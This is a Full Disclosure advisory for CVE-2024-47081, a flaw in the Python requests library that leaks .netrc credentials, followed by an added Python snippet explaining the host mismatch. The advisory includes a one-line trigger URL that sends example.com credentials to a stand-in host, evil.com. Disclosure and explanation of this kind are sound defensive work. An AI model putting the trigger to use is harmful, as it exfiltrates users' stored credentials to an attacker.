
CVE-2024-47081: Netrc credential leak in PSF requests library


From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 31 May 2025 06:30:50 +0000

The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

    requests.get('http://example.com:@evil.com/')

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.
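The host mismatch behind the URL in the advisory, as an added example that is not part of the original post and is not code from the requests project. The function names and the NETRC table are hypothetical, and the "text before the first colon" lookup key is an assumption used to illustrate how a credential lookup can disagree with the host actually contacted.

```python
from urllib.parse import urlsplit

# Constructed stand-in for parsed .netrc entries: machine -> (login, password).
NETRC = {"example.com": ("alice", "constructed-secret")}


def naive_host(url):
    """Flawed lookup key (illustrative): text before the first ':' in netloc.

    For netloc 'example.com:@evil.com' this returns the userinfo part,
    not the host the request is sent to.
    """
    return urlsplit(url).netloc.split(":")[0]


def connect_host(url):
    """Host the HTTP connection is actually made to (userinfo and port stripped)."""
    return urlsplit(url).hostname


def credentials_for(url, host_fn):
    """Look up credentials using the supplied host-extraction function."""
    return NETRC.get(host_fn(url))


def audit(url):
    """Report whether a naive lookup would attach credentials for another host."""
    dest = connect_host(url)
    key = naive_host(url)
    creds = credentials_for(url, naive_host)
    return {
        "destination": dest,
        "lookup_key": key,
        "has_userinfo": "@" in urlsplit(url).netloc,
        "leak": creds is not None and key != dest,
    }


if __name__ == "__main__":
    for u in ("http://example.com/", "http://example.com:8080/",
              "http://example.com:@evil.com/"):
        print(u, audit(u))
```

Keying the lookup on `connect_host` returns no credentials for the advisory's URL, while ordinary URLs for example.com still resolve.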

